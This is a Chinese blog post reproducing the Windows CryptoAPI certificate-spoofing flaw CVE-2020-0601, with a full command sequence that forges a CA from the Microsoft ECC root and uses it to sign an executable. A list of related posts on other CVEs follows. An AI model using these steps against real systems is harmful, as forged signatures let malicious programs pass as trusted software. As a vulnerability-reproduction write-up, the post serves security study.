win证书漏洞CVE-2020-0601

最新推荐文章于 2024-07-19 09:09:00 发布
最新推荐文章于 2024-07-19 09:09:00 发布
阅读量852 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44664530/article/details/106303414
版权

影响版本:
Windows 10
Windows Server 2016/2019
依赖于Windows CryptoAPI的应用程序
查看win证书
查看一下本地windows证书,win+r输入certmgr.msc
在这里插入图片描述
这里可以看到系统默认的ECC签名根证书,随便找一个导出:
在这里插入图片描述
在这里插入图片描述
双击证书可以看到证书的详细信息:
在这里插入图片描述
复现:

//安装 rudy
a@a-virtual-machine:~$ sudo apt install ruby
//若提示进程被占用解决方法
//ps -A | grep apt				列出使用的进程
//sudo kill -9 进程号				杀死进程
//生成spoofed_ca.key公钥文件
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//生成spoofed_ca.crt公钥文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa                               
Email Address []:aa															 '		
//生成cert.key密钥文件													
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//生成cert.csr文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//生成cert.crt签名证书
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//生成cert.p12证书文件
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
生成python_signed.exe签名可执行文件
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe

Command 'osslsigncode' not found, but can be installed with:

sudo apt install osslsigncode

a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密码: 
正在读取软件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded

在这里插入图片描述
在这里插入图片描述
参考文献:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673

曈曚
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
CVE-2020-0601:微软核心加密库漏洞复现
xiaoguachong的博客
03-09 1748
CVE-2020-0601:微软核心加密库漏洞复现 一:漏洞介绍 受CVE2020-0601漏洞影响的系统,在验证证书签名时,在证书信用列表中查找受信任CA证书时出现乌龙。伪造的ECC CA证书可以被误认为可信任的证书,导致该伪造证书签名的文件能被系统信任。比如,win10中证书MicrosoftECCProductRootCertificateAuthority.pem是在受信任的证书列表中。现...
网络安全最新有这个证书,网络安全工程师找工作不用愁_cve证书(1),2024年最新网络安全组件化架构实践
2401_84264491的博客
05-10 877
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈​。
微软证书漏洞CVE-2020-0601 高危漏洞加固指南
乐大厨串串香飘万里
10-14 640
1微软证书漏洞CVE-2020-0601高Windows。
说一说Windows严重安全漏洞CVE-2020-0601的原理
热门推荐
云与山的彼端
01-20 6万+
1. 背景 这是第一个由美国国安局(NSA)所发现并主动提交给微软的安全漏洞。 过去外界曾抨击NSA隐匿安全漏洞,只为追求网络间谍与攻击的做法罔顾广大用户的权益,才使得这次NSA主动向微软通报安全漏洞的事件跃上媒体标题。 CVE-2020-0601漏洞位于Window的加密组件CryptoAPI。 CryptoAPI是微软提供给开发人员的Windows安全服务应用程序接口,可用于加密的应用程...
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5272
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9209
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
windows SSL漏洞 CVE-2016-2183
weixin_42477596的博客
04-30 464
验证工具下载链接。
开发日志:windows修复SSL漏洞CVE-2016-2183(3389端口)
最新发布
老罗传奇
07-19 755
漏洞危害: 具有足够资源的中间人攻击者可利用此漏洞,通过“birthday”攻击检测会在固定密码与已知纯文本之间泄露 XOR 的冲突,进而泄露密码文本(例如安全 HTTPS Cookie),并可能导致劫持经认证的会话。 参见《支持SSL 64位块大小的密码套件(SWEET32)-修复方案》 参考资料:https://blog.csdn.net/weixin_46167705/article/de...
CVE-2016-2183漏洞修复
weixin_50712581的博客
07-13 1232
漏洞是由于 OpenSSL 中 DH 密钥交换算法的一个错误实现导致的,攻击者可以利用此漏洞对传输的加密流量进行中间人攻击,从而窃取加密通信内容。在该版本中,OpenSSL 官方对 DH 密钥交换算法实现进行了修复,修复了 CVE-2016-2183 漏洞,并添加了一些其他的安全补丁和功能改进。如果您使用的是 OpenSSL 1.0.2d 到 1.0.2h 版本之间的任何版本,则可能会受到 CVE-2016-2183 漏洞的影响。这是由于openssl库的位置不正确造成的。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
Microsoft IIS波浪号目录枚举/IIS短文件名枚举漏洞
weixin_44664530的博客
06-11 8123
Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。 复现: /images//*~1*/a.aspx?aspxerrorpath=/ 危害: 攻击者可以利用“~”字符猜解或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝服务攻击。 解决方案:修改注册列表HKLM\SYSTEM\CurrentControlSet\Control\FileSystem \NtfsDisable8dot3NameCreation的值为1,或者,
cve-2020-11652漏洞复现
weixin_44664530的博客
05-08 1489
介绍: Saltstack是基于python开发的一套C/S架构自动化运维工具,通过Saltstack运维人员可以实现在众多服务器上批量执行命令,提高运维效率,因而受到一些云主机商、私有云公司的青睐。然而,近日SaltStack被爆存在认证绕过漏洞CVE-2020-11651)和目录遍历漏洞CVE-2020-11652)。其中,通过认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master...
幽灵猫漏洞复现
weixin_44664530的博客
05-14 714
漏洞编号: CVE-2020-1938 CNVD-2020-10487 影响版本: Apache Tomcat = 6 7 <= Apache Tomcat < 7.0.100 8 <= Apache Tomcat < 8.5.51 9 <= Apache Tomcat < 9.0.31 解决措施: 配置ajp配置中的secretRequired跟secret属性来限制认证 ; 临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connec
CVE-2020-16875复现
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后,您需要在合适的环境中执行该代码。请确保您已经具备合适的权限,并且在测试环境中进行操作,以避免对真实系统造成损坏。 3. 执行POC代码后,它将尝试利用CVE-2020-16875漏洞攻击Microsoft Exchange Server。该漏洞允许远程攻击者在受影响的Exchange Server上执行任意代码。 4. 在执行POC代码之前,请确保已经阅读并理解了漏洞的风险和影响。同时,建议您在测试环境中进行演示,以避免对生产环境造成任何损害。 请注意,由于该漏洞可能导致严重的安全问题,建议您在使用POC代码或尝试复现漏洞之前,与您的系统管理员或安全团队进行协商和了解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值